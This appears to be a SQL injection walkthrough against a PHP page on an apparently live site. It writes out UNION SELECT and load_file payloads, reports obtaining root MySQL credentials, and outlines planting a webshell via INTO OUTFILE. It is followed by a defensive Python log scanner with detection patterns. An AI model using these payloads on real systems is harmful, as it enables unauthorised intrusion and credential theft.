Below we look at the PHP injection process.

Because the target is a live host on the network, we only test for injection here and do not carry out any further operations. We first append a single quote character to the URL; an error message is returned, which shows that the website may be injectable. Submitting and 1=1 displays the page normally, and submitting and 1=2 displays an error, so we continue by submitting a union injection statement. http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1 likewise displays an error message. From it, however, we learn the website's path and that it is a Linux system: /home/caiqing/www/view_detail.php. We continue to submit
http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1,2 and so on, until the website displays normally at 1,2,3,4,5,6,7,8,9,10,11. We then enter http://www.xxx.net/view_datail.php?id=357 and 1=2 union in place of http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11, and the page appears as shown in the figure:

The digits 3, 5, 8, 9, 7 and so on appear in the figure. Comparing it with the original page, we can see that the digits 3, 5 and 7 in the figure are character fields, so we can use a load_file statement to display the website's source code there and obtain the MySQL account and password without difficulty.
We then convert /home/caiqing/www/view_detail.php to ASCII, which gives char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112,104,112), and put the load_file call in place of the digit 7, as follows:
http://www.xxx.net/view_datail.php?id=357%20and%201=2%20union%20select%201,2,3,4,5,6,load_file(char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112,104,112)),8,9,10,11
As shown in the figure:

We see a config.php, which is probably the database configuration file. Using the same method to display this website's database configuration file, we finally obtain the MySQL account and password, which has root privileges. With that, we could create a table directly, insert a one-line web shell into it, and then use select * from rose into outfile "/home/caiqing/www/shelll.php"; to obtain a webshell. We could also run a select statement against the user table in the database and display the administrator user name and password in the URL in place of the digits 3 and 5. Since this is only a technical analysis, we do not explain it in detail.
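From the defender's side, every request in this walkthrough leaves a recognisable trace in the web server's access log. The following is an added example, not code from the original article: a small Python scanner whose rule names, function names and sample log lines are assumptions of this example, with only the request patterns and the char() list taken from the text above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rule names are this example's own; the patterns mirror the requests in the walkthrough.
RULES = {
    "lone_quote": re.compile(r"^[^']*'[^']*$"),
    "boolean_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
}
CHAR_CALL = re.compile(r"\bchar\s*\(([\d\s,]+)\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(query):
    """URL-decode twice (double encoding), drop /* */ comments, collapse whitespace."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def decode_char_calls(text):
    """Expand char(47,104,...) so the analyst sees which string was hidden."""
    decoded = []
    for match in CHAR_CALL.finditer(text):
        codes = [int(n) for n in re.findall(r"\d+", match.group(1))]
        if codes and all(c < 256 for c in codes):
            decoded.append(bytes(codes).decode("latin-1"))
    return decoded

def inspect_line(log_line):
    """Return path, matched rule names and decoded char() strings, or None if unparsable."""
    match = REQUEST.search(log_line)
    if match is None:
        return None
    url = urlsplit(match.group(1))
    text = normalise(url.query)
    hits = [name for name, rule in RULES.items() if rule.search(text)]
    return {"path": url.path, "hits": hits, "decoded": decode_char_calls(text)}

# Constructed access-log lines (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.7 - - [01/Jan/2024:10:00:00 +0000] "GET /view_datail.php?id=357 HTTP/1.1" 200 5120',
    '192.0.2.9 - - [01/Jan/2024:10:00:05 +0000] "GET /view_datail.php?id=357%27 HTTP/1.1" 200 310',
    '192.0.2.9 - - [01/Jan/2024:10:00:40 +0000] "GET /view_datail.php?id=357%20and%201=2%20union%20select%201,2,3,4,5,6,load_file(char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112,104,112)),8,9,10,11 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_line(line))
```

Matches like these are a triage aid only. The underlying fix is a parameterised query for `id` and a MySQL account for the site that is not root and lacks the FILE privilege that `load_file` and `into outfile` require.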